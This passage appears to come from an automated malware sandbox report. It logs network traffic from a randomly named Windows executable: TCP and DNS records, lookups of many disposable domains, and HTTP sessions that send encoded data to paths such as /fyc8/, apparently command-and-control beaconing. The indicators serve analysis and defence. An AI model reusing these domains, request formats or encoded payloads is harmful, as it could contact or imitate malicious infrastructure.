                                                                                Dec 4, 2024 15:33:54.365943909 CET5000380192.168.2.78.223.59.213
                                                                                Dec 4, 2024 15:33:55.258217096 CET5000480192.168.2.78.223.59.213
                                                                                Dec 4, 2024 15:33:55.378098965 CET80500048.223.59.213192.168.2.7
                                                                                Dec 4, 2024 15:33:55.378254890 CET5000480192.168.2.78.223.59.213
                                                                                Dec 4, 2024 15:33:55.389847994 CET5000480192.168.2.78.223.59.213
                                                                                Dec 4, 2024 15:33:55.509794950 CET80500048.223.59.213192.168.2.7
                                                                                Dec 4, 2024 15:33:56.924983978 CET80500048.223.59.213192.168.2.7
                                                                                Dec 4, 2024 15:33:56.925086021 CET80500048.223.59.213192.168.2.7
                                                                                Dec 4, 2024 15:33:56.925216913 CET5000480192.168.2.78.223.59.213
                                                                                Dec 4, 2024 15:33:56.939795017 CET5000480192.168.2.78.223.59.213
                                                                                Dec 4, 2024 15:33:57.060084105 CET80500048.223.59.213192.168.2.7
                                                                                Dec 4, 2024 15:34:02.488562107 CET5000580192.168.2.754.176.168.58
                                                                                Dec 4, 2024 15:34:02.608549118 CET805000554.176.168.58192.168.2.7
                                                                                Dec 4, 2024 15:34:02.612652063 CET5000580192.168.2.754.176.168.58
                                                                                Dec 4, 2024 15:34:02.627599001 CET5000580192.168.2.754.176.168.58
                                                                                Dec 4, 2024 15:34:02.748048067 CET805000554.176.168.58192.168.2.7
                                                                                Dec 4, 2024 15:34:03.967509031 CET805000554.176.168.58192.168.2.7
                                                                                Dec 4, 2024 15:34:03.967650890 CET805000554.176.168.58192.168.2.7
                                                                                Dec 4, 2024 15:34:03.967662096 CET805000554.176.168.58192.168.2.7
                                                                                Dec 4, 2024 15:34:03.968554974 CET5000580192.168.2.754.176.168.58
                                                                                Dec 4, 2024 15:34:04.129435062 CET5000580192.168.2.754.176.168.58
                                                                                Dec 4, 2024 15:34:05.154321909 CET5000680192.168.2.754.176.168.58
                                                                                Dec 4, 2024 15:34:05.276130915 CET805000654.176.168.58192.168.2.7
                                                                                Dec 4, 2024 15:34:05.276249886 CET5000680192.168.2.754.176.168.58
                                                                                Dec 4, 2024 15:34:05.327066898 CET5000680192.168.2.754.176.168.58
                                                                                Dec 4, 2024 15:34:05.447066069 CET805000654.176.168.58192.168.2.7
                                                                                Dec 4, 2024 15:34:06.531832933 CET805000654.176.168.58192.168.2.7
                                                                                Dec 4, 2024 15:34:06.532017946 CET805000654.176.168.58192.168.2.7
                                                                                Dec 4, 2024 15:34:06.532149076 CET5000680192.168.2.754.176.168.58
                                                                                Dec 4, 2024 15:34:06.532267094 CET805000654.176.168.58192.168.2.7
                                                                                Dec 4, 2024 15:34:06.532361031 CET5000680192.168.2.754.176.168.58
                                                                                Dec 4, 2024 15:34:06.834599018 CET5000680192.168.2.754.176.168.58
                                                                                Dec 4, 2024 15:34:08.004549026 CET5000780192.168.2.754.176.168.58
                                                                                Dec 4, 2024 15:34:08.125099897 CET805000754.176.168.58192.168.2.7
                                                                                Dec 4, 2024 15:34:08.125313997 CET5000780192.168.2.754.176.168.58
                                                                                Dec 4, 2024 15:34:08.160809040 CET5000780192.168.2.754.176.168.58
                                                                                Dec 4, 2024 15:34:08.366142988 CET805000754.176.168.58192.168.2.7
                                                                                Dec 4, 2024 15:34:08.366156101 CET805000754.176.168.58192.168.2.7
                                                                                Dec 4, 2024 15:34:09.475188971 CET805000754.176.168.58192.168.2.7
                                                                                Dec 4, 2024 15:34:09.475289106 CET805000754.176.168.58192.168.2.7
                                                                                Dec 4, 2024 15:34:09.475333929 CET5000780192.168.2.754.176.168.58
                                                                                Dec 4, 2024 15:34:09.475482941 CET805000754.176.168.58192.168.2.7
                                                                                Dec 4, 2024 15:34:09.475526094 CET5000780192.168.2.754.176.168.58
                                                                                Dec 4, 2024 15:34:09.676223993 CET5000780192.168.2.754.176.168.58
                                                                                Dec 4, 2024 15:34:10.694911003 CET5000880192.168.2.754.176.168.58
                                                                                Dec 4, 2024 15:34:10.816154003 CET805000854.176.168.58192.168.2.7
                                                                                Dec 4, 2024 15:34:10.818794966 CET5000880192.168.2.754.176.168.58
                                                                                Dec 4, 2024 15:34:10.830578089 CET5000880192.168.2.754.176.168.58
                                                                                Dec 4, 2024 15:34:10.956950903 CET805000854.176.168.58192.168.2.7
                                                                                Dec 4, 2024 15:34:12.095557928 CET805000854.176.168.58192.168.2.7
                                                                                Dec 4, 2024 15:34:12.095763922 CET805000854.176.168.58192.168.2.7
                                                                                Dec 4, 2024 15:34:12.096057892 CET805000854.176.168.58192.168.2.7
                                                                                Dec 4, 2024 15:34:12.096342087 CET5000880192.168.2.754.176.168.58
                                                                                Dec 4, 2024 15:34:12.099045992 CET5000880192.168.2.754.176.168.58
                                                                                Dec 4, 2024 15:34:12.220597029 CET805000854.176.168.58192.168.2.7
                                                                                Dec 4, 2024 15:34:17.857368946 CET5000980192.168.2.7199.59.243.227
                                                                                Dec 4, 2024 15:34:17.977247953 CET8050009199.59.243.227192.168.2.7
                                                                                Dec 4, 2024 15:34:17.978075027 CET5000980192.168.2.7199.59.243.227
                                                                                Dec 4, 2024 15:34:18.005403996 CET5000980192.168.2.7199.59.243.227
                                                                                Dec 4, 2024 15:34:18.125533104 CET8050009199.59.243.227192.168.2.7
                                                                                Dec 4, 2024 15:34:19.106170893 CET8050009199.59.243.227192.168.2.7
                                                                                Dec 4, 2024 15:34:19.106319904 CET8050009199.59.243.227192.168.2.7
                                                                                Dec 4, 2024 15:34:19.106374979 CET5000980192.168.2.7199.59.243.227
                                                                                Dec 4, 2024 15:34:19.106553078 CET8050009199.59.243.227192.168.2.7
                                                                                Dec 4, 2024 15:34:19.106612921 CET5000980192.168.2.7199.59.243.227
                                                                                Dec 4, 2024 15:34:19.519882917 CET5000980192.168.2.7199.59.243.227
                                                                                Dec 4, 2024 15:34:20.552532911 CET5001080192.168.2.7199.59.243.227
                                                                                Dec 4, 2024 15:34:20.673166990 CET8050010199.59.243.227192.168.2.7
                                                                                Dec 4, 2024 15:34:20.676650047 CET5001080192.168.2.7199.59.243.227
                                                                                Dec 4, 2024 15:34:20.732547045 CET5001080192.168.2.7199.59.243.227
                                                                                Dec 4, 2024 15:34:20.852433920 CET8050010199.59.243.227192.168.2.7
                                                                                Dec 4, 2024 15:34:21.839943886 CET8050010199.59.243.227192.168.2.7
                                                                                Dec 4, 2024 15:34:21.840245008 CET8050010199.59.243.227192.168.2.7
                                                                                Dec 4, 2024 15:34:21.840342999 CET5001080192.168.2.7199.59.243.227
                                                                                Dec 4, 2024 15:34:21.840847969 CET8050010199.59.243.227192.168.2.7
                                                                                Dec 4, 2024 15:34:21.840907097 CET5001080192.168.2.7199.59.243.227
                                                                                Dec 4, 2024 15:34:22.238707066 CET5001080192.168.2.7199.59.243.227
                                                                                Dec 4, 2024 15:34:23.320100069 CET5001180192.168.2.7199.59.243.227
                                                                                Dec 4, 2024 15:34:23.440058947 CET8050011199.59.243.227192.168.2.7
                                                                                Dec 4, 2024 15:34:23.440191031 CET5001180192.168.2.7199.59.243.227
                                                                                Dec 4, 2024 15:34:23.576796055 CET5001180192.168.2.7199.59.243.227
                                                                                Dec 4, 2024 15:34:23.696997881 CET8050011199.59.243.227192.168.2.7
                                                                                Dec 4, 2024 15:34:23.697078943 CET8050011199.59.243.227192.168.2.7
                                                                                Dec 4, 2024 15:34:24.580777884 CET8050011199.59.243.227192.168.2.7
                                                                                Dec 4, 2024 15:34:24.580985069 CET8050011199.59.243.227192.168.2.7
                                                                                Dec 4, 2024 15:34:24.581067085 CET5001180192.168.2.7199.59.243.227
                                                                                Dec 4, 2024 15:34:24.581244946 CET8050011199.59.243.227192.168.2.7
                                                                                Dec 4, 2024 15:34:24.581329107 CET5001180192.168.2.7199.59.243.227
                                                                                Dec 4, 2024 15:34:25.082566023 CET5001180192.168.2.7199.59.243.227
                                                                                Dec 4, 2024 15:34:26.104554892 CET5001280192.168.2.7199.59.243.227
                                                                                Dec 4, 2024 15:34:26.224697113 CET8050012199.59.243.227192.168.2.7
                                                                                Dec 4, 2024 15:34:26.228786945 CET5001280192.168.2.7199.59.243.227
                                                                                Dec 4, 2024 15:34:26.356112003 CET5001280192.168.2.7199.59.243.227
                                                                                Dec 4, 2024 15:34:26.476139069 CET8050012199.59.243.227192.168.2.7
                                                                                Dec 4, 2024 15:34:27.407686949 CET8050012199.59.243.227192.168.2.7
                                                                                Dec 4, 2024 15:34:27.407888889 CET8050012199.59.243.227192.168.2.7
                                                                                Dec 4, 2024 15:34:27.408010006 CET5001280192.168.2.7199.59.243.227
                                                                                Dec 4, 2024 15:34:27.409758091 CET8050012199.59.243.227192.168.2.7
                                                                                Dec 4, 2024 15:34:27.409796953 CET5001280192.168.2.7199.59.243.227
                                                                                Dec 4, 2024 15:34:27.411134958 CET5001280192.168.2.7199.59.243.227
                                                                                Dec 4, 2024 15:34:27.530930996 CET8050012199.59.243.227192.168.2.7
                                                                                Dec 4, 2024 15:34:33.540317059 CET5001380192.168.2.785.159.66.93
                                                                                Dec 4, 2024 15:34:33.660245895 CET805001385.159.66.93192.168.2.7
                                                                                Dec 4, 2024 15:34:33.660429001 CET5001380192.168.2.785.159.66.93
                                                                                Dec 4, 2024 15:34:33.678714991 CET5001380192.168.2.785.159.66.93
                                                                                Dec 4, 2024 15:34:33.798655033 CET805001385.159.66.93192.168.2.7
                                                                                Dec 4, 2024 15:34:35.191869020 CET5001380192.168.2.785.159.66.93
                                                                                Dec 4, 2024 15:34:35.311976910 CET805001385.159.66.93192.168.2.7
                                                                                Dec 4, 2024 15:34:35.312041998 CET5001380192.168.2.785.159.66.93
                                                                                Dec 4, 2024 15:34:36.212554932 CET5001480192.168.2.785.159.66.93
                                                                                Dec 4, 2024 15:34:36.332642078 CET805001485.159.66.93192.168.2.7
                                                                                Dec 4, 2024 15:34:36.336720943 CET5001480192.168.2.785.159.66.93
                                                                                Dec 4, 2024 15:34:36.356486082 CET5001480192.168.2.785.159.66.93
                                                                                Dec 4, 2024 15:34:36.477988958 CET805001485.159.66.93192.168.2.7
                                                                                Dec 4, 2024 15:34:37.863746881 CET5001480192.168.2.785.159.66.93
                                                                                Dec 4, 2024 15:34:37.984653950 CET805001485.159.66.93192.168.2.7
                                                                                Dec 4, 2024 15:34:37.984716892 CET5001480192.168.2.785.159.66.93
                                                                                Dec 4, 2024 15:34:39.164664984 CET5001580192.168.2.785.159.66.93
                                                                                Dec 4, 2024 15:34:39.284550905 CET805001585.159.66.93192.168.2.7
                                                                                Dec 4, 2024 15:34:39.284683943 CET5001580192.168.2.785.159.66.93
                                                                                Dec 4, 2024 15:34:39.306025982 CET5001580192.168.2.785.159.66.93
                                                                                Dec 4, 2024 15:34:39.426000118 CET805001585.159.66.93192.168.2.7
                                                                                Dec 4, 2024 15:34:39.426012993 CET805001585.159.66.93192.168.2.7
                                                                                Dec 4, 2024 15:34:40.820543051 CET5001580192.168.2.785.159.66.93
                                                                                Dec 4, 2024 15:34:40.941121101 CET805001585.159.66.93192.168.2.7
                                                                                Dec 4, 2024 15:34:40.942624092 CET5001580192.168.2.785.159.66.93
                                                                                Dec 4, 2024 15:34:41.864238977 CET5001680192.168.2.785.159.66.93
                                                                                Dec 4, 2024 15:34:41.984378099 CET805001685.159.66.93192.168.2.7
                                                                                Dec 4, 2024 15:34:41.984466076 CET5001680192.168.2.785.159.66.93
                                                                                Dec 4, 2024 15:34:42.000524998 CET5001680192.168.2.785.159.66.93
                                                                                Dec 4, 2024 15:34:42.120321035 CET805001685.159.66.93192.168.2.7
                                                                                Dec 4, 2024 15:34:43.331453085 CET805001685.159.66.93192.168.2.7
                                                                                Dec 4, 2024 15:34:43.331506014 CET805001685.159.66.93192.168.2.7
                                                                                Dec 4, 2024 15:34:43.331646919 CET5001680192.168.2.785.159.66.93
                                                                                Dec 4, 2024 15:34:43.336080074 CET5001680192.168.2.785.159.66.93
                                                                                Dec 4, 2024 15:34:43.456079960 CET805001685.159.66.93192.168.2.7
                                                                                Dec 4, 2024 15:34:48.893245935 CET5001980192.168.2.738.63.190.200
                                                                                Dec 4, 2024 15:34:49.013094902 CET805001938.63.190.200192.168.2.7
                                                                                Dec 4, 2024 15:34:49.013190031 CET5001980192.168.2.738.63.190.200
                                                                                Dec 4, 2024 15:34:49.032622099 CET5001980192.168.2.738.63.190.200
                                                                                Dec 4, 2024 15:34:49.152395010 CET805001938.63.190.200192.168.2.7
                                                                                Dec 4, 2024 15:34:51.707396030 CET5001980192.168.2.738.63.190.200
                                                                                Dec 4, 2024 15:34:51.845268011 CET805001938.63.190.200192.168.2.7
                                                                                Dec 4, 2024 15:34:51.845349073 CET5001980192.168.2.738.63.190.200

                                                                                UDP Packets

                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                Dec 4, 2024 15:31:22.426341057 CET6448253192.168.2.71.1.1.1
                                                                                Dec 4, 2024 15:31:22.925955057 CET53644821.1.1.1192.168.2.7
                                                                                Dec 4, 2024 15:31:39.367629051 CET6255953192.168.2.71.1.1.1
                                                                                Dec 4, 2024 15:31:39.925683022 CET53625591.1.1.1192.168.2.7
                                                                                Dec 4, 2024 15:31:54.742553949 CET5543753192.168.2.71.1.1.1
                                                                                Dec 4, 2024 15:31:55.045418024 CET53554371.1.1.1192.168.2.7
                                                                                Dec 4, 2024 15:32:09.696635962 CET5396653192.168.2.71.1.1.1
                                                                                Dec 4, 2024 15:32:10.446192980 CET53539661.1.1.1192.168.2.7
                                                                                Dec 4, 2024 15:32:24.820398092 CET5993953192.168.2.71.1.1.1
                                                                                Dec 4, 2024 15:32:25.135519028 CET53599391.1.1.1192.168.2.7
                                                                                Dec 4, 2024 15:33:00.196146011 CET5886953192.168.2.71.1.1.1
                                                                                Dec 4, 2024 15:33:01.172326088 CET53588691.1.1.1192.168.2.7
                                                                                Dec 4, 2024 15:33:15.666418076 CET6087253192.168.2.71.1.1.1
                                                                                Dec 4, 2024 15:33:16.000905991 CET53608721.1.1.1192.168.2.7
                                                                                Dec 4, 2024 15:33:30.714859009 CET5818753192.168.2.71.1.1.1
                                                                                Dec 4, 2024 15:33:31.207896948 CET53581871.1.1.1192.168.2.7
                                                                                Dec 4, 2024 15:33:45.680226088 CET5473753192.168.2.71.1.1.1
                                                                                Dec 4, 2024 15:33:46.676275969 CET5473753192.168.2.71.1.1.1
                                                                                Dec 4, 2024 15:33:47.227288008 CET53547371.1.1.1192.168.2.7
                                                                                Dec 4, 2024 15:33:47.227298021 CET53547371.1.1.1192.168.2.7
                                                                                Dec 4, 2024 15:34:01.948585987 CET5078153192.168.2.71.1.1.1
                                                                                Dec 4, 2024 15:34:02.484493971 CET53507811.1.1.1192.168.2.7
                                                                                Dec 4, 2024 15:34:17.118254900 CET5701553192.168.2.71.1.1.1
                                                                                Dec 4, 2024 15:34:17.852608919 CET53570151.1.1.1192.168.2.7
                                                                                Dec 4, 2024 15:34:32.430567980 CET6465453192.168.2.71.1.1.1
                                                                                Dec 4, 2024 15:34:33.426485062 CET6465453192.168.2.71.1.1.1
                                                                                Dec 4, 2024 15:34:33.537363052 CET53646541.1.1.1192.168.2.7
                                                                                Dec 4, 2024 15:34:33.570251942 CET53646541.1.1.1192.168.2.7
                                                                                Dec 4, 2024 15:34:48.352518082 CET5688553192.168.2.71.1.1.1
                                                                                Dec 4, 2024 15:34:48.887554884 CET53568851.1.1.1192.168.2.7

                                                                                DNS Queries

                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                Dec 4, 2024 15:31:22.426341057 CET192.168.2.71.1.1.10x6aa4Standard query (0)www.aextligrwjv.bestA (IP address)IN (0x0001)false
                                                                                Dec 4, 2024 15:31:39.367629051 CET192.168.2.71.1.1.10xdbc9Standard query (0)www.duwixushx.xyzA (IP address)IN (0x0001)false
                                                                                Dec 4, 2024 15:31:54.742553949 CET192.168.2.71.1.1.10x36f5Standard query (0)www.vayui.topA (IP address)IN (0x0001)false
                                                                                Dec 4, 2024 15:32:09.696635962 CET192.168.2.71.1.1.10x783fStandard query (0)www.remedies.proA (IP address)IN (0x0001)false
                                                                                Dec 4, 2024 15:32:24.820398092 CET192.168.2.71.1.1.10x34e8Standard query (0)www.327531.buzzA (IP address)IN (0x0001)false
                                                                                Dec 4, 2024 15:33:00.196146011 CET192.168.2.71.1.1.10x7ac0Standard query (0)www.everythlngict.orgA (IP address)IN (0x0001)false
                                                                                Dec 4, 2024 15:33:15.666418076 CET192.168.2.71.1.1.10x55b9Standard query (0)www.3kw40881107247y.clickA (IP address)IN (0x0001)false
                                                                                Dec 4, 2024 15:33:30.714859009 CET192.168.2.71.1.1.10x3c83Standard query (0)www.futurorks.xyzA (IP address)IN (0x0001)false
                                                                                Dec 4, 2024 15:33:45.680226088 CET192.168.2.71.1.1.10xf2c2Standard query (0)www.hwbzfdtn.tokyoA (IP address)IN (0x0001)false
                                                                                Dec 4, 2024 15:33:46.676275969 CET192.168.2.71.1.1.10xf2c2Standard query (0)www.hwbzfdtn.tokyoA (IP address)IN (0x0001)false
                                                                                Dec 4, 2024 15:34:01.948585987 CET192.168.2.71.1.1.10x4373Standard query (0)www.129glenforest.comA (IP address)IN (0x0001)false
                                                                                Dec 4, 2024 15:34:17.118254900 CET192.168.2.71.1.1.10xd7a8Standard query (0)www.dating-ml-es.xyzA (IP address)IN (0x0001)false
                                                                                Dec 4, 2024 15:34:32.430567980 CET192.168.2.71.1.1.10x8210Standard query (0)www.soainsaat.xyzA (IP address)IN (0x0001)false
                                                                                Dec 4, 2024 15:34:33.426485062 CET192.168.2.71.1.1.10x8210Standard query (0)www.soainsaat.xyzA (IP address)IN (0x0001)false
                                                                                Dec 4, 2024 15:34:48.352518082 CET192.168.2.71.1.1.10xda0eStandard query (0)www.nicolemichelle.netA (IP address)IN (0x0001)false

                                                                                DNS Answers

                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                Dec 4, 2024 15:31:22.925955057 CET1.1.1.1192.168.2.70x6aa4No error (0)www.aextligrwjv.best172.67.185.6A (IP address)IN (0x0001)false
                                                                                Dec 4, 2024 15:31:22.925955057 CET1.1.1.1192.168.2.70x6aa4No error (0)www.aextligrwjv.best104.21.84.22A (IP address)IN (0x0001)false
                                                                                Dec 4, 2024 15:31:39.925683022 CET1.1.1.1192.168.2.70xdbc9No error (0)www.duwixushx.xyz156.251.17.224A (IP address)IN (0x0001)false
                                                                                Dec 4, 2024 15:31:55.045418024 CET1.1.1.1192.168.2.70x36f5No error (0)www.vayui.top172.67.145.234A (IP address)IN (0x0001)false
                                                                                Dec 4, 2024 15:31:55.045418024 CET1.1.1.1192.168.2.70x36f5No error (0)www.vayui.top104.21.95.160A (IP address)IN (0x0001)false
                                                                                Dec 4, 2024 15:32:10.446192980 CET1.1.1.1192.168.2.70x783fNo error (0)www.remedies.pro13.248.169.48A (IP address)IN (0x0001)false
                                                                                Dec 4, 2024 15:32:10.446192980 CET1.1.1.1192.168.2.70x783fNo error (0)www.remedies.pro76.223.54.146A (IP address)IN (0x0001)false
                                                                                Dec 4, 2024 15:32:25.135519028 CET1.1.1.1192.168.2.70x34e8No error (0)www.327531.buzz43.199.54.158A (IP address)IN (0x0001)false
                                                                                Dec 4, 2024 15:33:01.172326088 CET1.1.1.1192.168.2.70x7ac0No error (0)www.everythlngict.orgzhs.zohosites.comCNAME (Canonical name)IN (0x0001)false
                                                                                Dec 4, 2024 15:33:01.172326088 CET1.1.1.1192.168.2.70x7ac0No error (0)zhs.zohosites.com136.143.186.12A (IP address)IN (0x0001)false
                                                                                Dec 4, 2024 15:33:16.000905991 CET1.1.1.1192.168.2.70x55b9No error (0)www.3kw40881107247y.click172.67.192.207A (IP address)IN (0x0001)false
                                                                                Dec 4, 2024 15:33:16.000905991 CET1.1.1.1192.168.2.70x55b9No error (0)www.3kw40881107247y.click104.21.44.16A (IP address)IN (0x0001)false
                                                                                Dec 4, 2024 15:33:31.207896948 CET1.1.1.1192.168.2.70x3c83No error (0)www.futurorks.xyz203.161.43.228A (IP address)IN (0x0001)false
                                                                                Dec 4, 2024 15:33:47.227288008 CET1.1.1.1192.168.2.70xf2c2No error (0)www.hwbzfdtn.tokyobenteng01.cnCNAME (Canonical name)IN (0x0001)false
                                                                                Dec 4, 2024 15:33:47.227288008 CET1.1.1.1192.168.2.70xf2c2No error (0)benteng01.cn8.223.59.213A (IP address)IN (0x0001)false
                                                                                Dec 4, 2024 15:33:47.227298021 CET1.1.1.1192.168.2.70xf2c2No error (0)www.hwbzfdtn.tokyobenteng01.cnCNAME (Canonical name)IN (0x0001)false
                                                                                Dec 4, 2024 15:33:47.227298021 CET1.1.1.1192.168.2.70xf2c2No error (0)benteng01.cn8.223.59.213A (IP address)IN (0x0001)false
                                                                                Dec 4, 2024 15:34:02.484493971 CET1.1.1.1192.168.2.70x4373No error (0)www.129glenforest.comdomains-38.cribflyer.comCNAME (Canonical name)IN (0x0001)false
                                                                                Dec 4, 2024 15:34:02.484493971 CET1.1.1.1192.168.2.70x4373No error (0)domains-38.cribflyer.com54.176.168.58A (IP address)IN (0x0001)false
                                                                                Dec 4, 2024 15:34:02.484493971 CET1.1.1.1192.168.2.70x4373No error (0)domains-38.cribflyer.com52.52.120.92A (IP address)IN (0x0001)false
                                                                                Dec 4, 2024 15:34:17.852608919 CET1.1.1.1192.168.2.70xd7a8No error (0)www.dating-ml-es.xyz199.59.243.227A (IP address)IN (0x0001)false
                                                                                Dec 4, 2024 15:34:33.537363052 CET1.1.1.1192.168.2.70x8210No error (0)www.soainsaat.xyzredirect.natrocdn.comCNAME (Canonical name)IN (0x0001)false
                                                                                Dec 4, 2024 15:34:33.537363052 CET1.1.1.1192.168.2.70x8210No error (0)redirect.natrocdn.comnatroredirect.natrocdn.comCNAME (Canonical name)IN (0x0001)false
                                                                                Dec 4, 2024 15:34:33.537363052 CET1.1.1.1192.168.2.70x8210No error (0)natroredirect.natrocdn.com85.159.66.93A (IP address)IN (0x0001)false
                                                                                Dec 4, 2024 15:34:33.570251942 CET1.1.1.1192.168.2.70x8210No error (0)www.soainsaat.xyzredirect.natrocdn.comCNAME (Canonical name)IN (0x0001)false
                                                                                Dec 4, 2024 15:34:33.570251942 CET1.1.1.1192.168.2.70x8210No error (0)redirect.natrocdn.comnatroredirect.natrocdn.comCNAME (Canonical name)IN (0x0001)false
                                                                                Dec 4, 2024 15:34:33.570251942 CET1.1.1.1192.168.2.70x8210No error (0)natroredirect.natrocdn.com85.159.66.93A (IP address)IN (0x0001)false
                                                                                Dec 4, 2024 15:34:48.887554884 CET1.1.1.1192.168.2.70xda0eNo error (0)www.nicolemichelle.net38.63.190.200A (IP address)IN (0x0001)false

                                                                                HTTP Request Dependency Graph

                                                                                • www.aextligrwjv.best
                                                                                • www.duwixushx.xyz
                                                                                • www.vayui.top
                                                                                • www.remedies.pro
                                                                                • www.327531.buzz
                                                                                • www.everythlngict.org
                                                                                • www.3kw40881107247y.click
                                                                                • www.futurorks.xyz
                                                                                • www.hwbzfdtn.tokyo
                                                                                • www.129glenforest.com
                                                                                • www.dating-ml-es.xyz
                                                                                • www.soainsaat.xyz
                                                                                • www.nicolemichelle.net

                                                                                HTTP Packets

                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                0192.168.2.749771172.67.185.6807000C:\Program Files (x86)\nKYkNaBUuvYpEblkgBFeBoxkBdtJJcMByicKuslhjIGiYOjTwZLBSDCwuLzDWOVtprrjBvghLAnJBXT\RlKZsaoEJNpD.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 4, 2024 15:31:23.063009024 CET494OUTGET /msiy/?9hy=gvrDS8U8OP&GhEtuH=vWnR7wTg66d2ddFO/hOe3tyOuhU6gKBnFLqMp8Vj889T3d63TkYAebsAkWFQIzapGgDNCMxKcgjSNeLYtFe43HwIPdM+jeFQKV7h03gcmWP5dRjf9VfH50dWMQ/EONfHOgL151a+js8J HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                Accept-Language: en-US,en;q=0.5
                                                                                Host: www.aextligrwjv.best
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; MT2L03 Build/HuaweiMT2L03) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                Dec 4, 2024 15:31:24.306360006 CET847INHTTP/1.1 404 Not Found
                                                                                Date: Wed, 04 Dec 2024 14:31:24 GMT
                                                                                Content-Type: text/plain; charset=utf-8
                                                                                Content-Length: 19
                                                                                Connection: close
                                                                                X-Content-Type-Options: nosniff
                                                                                CF-Cache-Status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=H9J%2Boy8JtxLUib5LByq8EBXSF4xiTD1UQfqkgnzkcB%2FBEo0n0CPB8pX7ZjQUXNlN7dBlXS4wVS5hCdzyZPP8IOxGV%2Bvf%2BvzcIBs10Pw0ppc7fIwMxVqyQk%2Fl3LZYvCGadCR6Ij6%2BQw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 8ecc7ff79bde42e4-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=13055&min_rtt=13055&rtt_var=6527&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=494&delivery_rate=0&cwnd=226&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a
                                                                                Data Ascii: 404 page not found


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1192.168.2.749804156.251.17.224807000C:\Program Files (x86)\nKYkNaBUuvYpEblkgBFeBoxkBdtJJcMByicKuslhjIGiYOjTwZLBSDCwuLzDWOVtprrjBvghLAnJBXT\RlKZsaoEJNpD.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 4, 2024 15:31:40.076833963 CET750OUTPOST /fyc8/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                Accept-Encoding: gzip, deflate
                                                                                Accept-Language: en-US,en;q=0.5
                                                                                Host: www.duwixushx.xyz
                                                                                Origin: http://www.duwixushx.xyz
                                                                                Content-Length: 219
                                                                                Cache-Control: no-cache
                                                                                Connection: close
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Referer: http://www.duwixushx.xyz/fyc8/
                                                                                User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; MT2L03 Build/HuaweiMT2L03) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                Data Raw: 47 68 45 74 75 48 3d 77 6f 47 45 34 34 4b 56 65 31 7a 7a 32 73 4a 73 4a 44 79 31 52 57 67 78 4d 66 6f 31 70 35 6b 50 6a 4a 68 49 59 56 7a 76 4d 38 53 34 75 64 4d 77 6f 58 59 72 76 37 2b 4d 75 54 61 36 6d 68 6d 4e 49 72 52 39 65 58 50 2b 34 70 45 70 6d 69 70 30 6b 64 6a 44 6c 4f 5a 55 6a 77 51 6c 6b 54 32 4b 44 42 6f 6b 47 58 4a 39 4a 45 69 42 56 4a 2b 39 54 55 44 59 4d 49 49 62 34 2f 51 6d 4d 38 75 50 41 61 65 53 7a 45 67 53 44 65 78 2b 6f 6b 71 79 68 31 75 68 4a 6b 4e 52 58 49 36 41 58 6e 5a 53 35 4c 36 42 43 6d 55 6c 4d 54 77 6e 53 65 61 78 66 49 45 6d 70 6a 76 35 2f 49 6b 6d 6c 76 41 6b 65 5a 67 4e 69 52 7a 56 51 7a 39 5a 4a 38 33 50 67 77 3d 3d
                                                                                Data Ascii: GhEtuH=woGE44KVe1zz2sJsJDy1RWgxMfo1p5kPjJhIYVzvM8S4udMwoXYrv7+MuTa6mhmNIrR9eXP+4pEpmip0kdjDlOZUjwQlkT2KDBokGXJ9JEiBVJ+9TUDYMIIb4/QmM8uPAaeSzEgSDex+okqyh1uhJkNRXI6AXnZS5L6BCmUlMTwnSeaxfIEmpjv5/IkmlvAkeZgNiRzVQz9ZJ83Pgw==
                                                                                Dec 4, 2024 15:31:41.672455072 CET289INHTTP/1.1 404 Not Found
                                                                                Server: nginx
                                                                                Date: Wed, 04 Dec 2024 14:31:41 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 146
                                                                                Connection: close
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
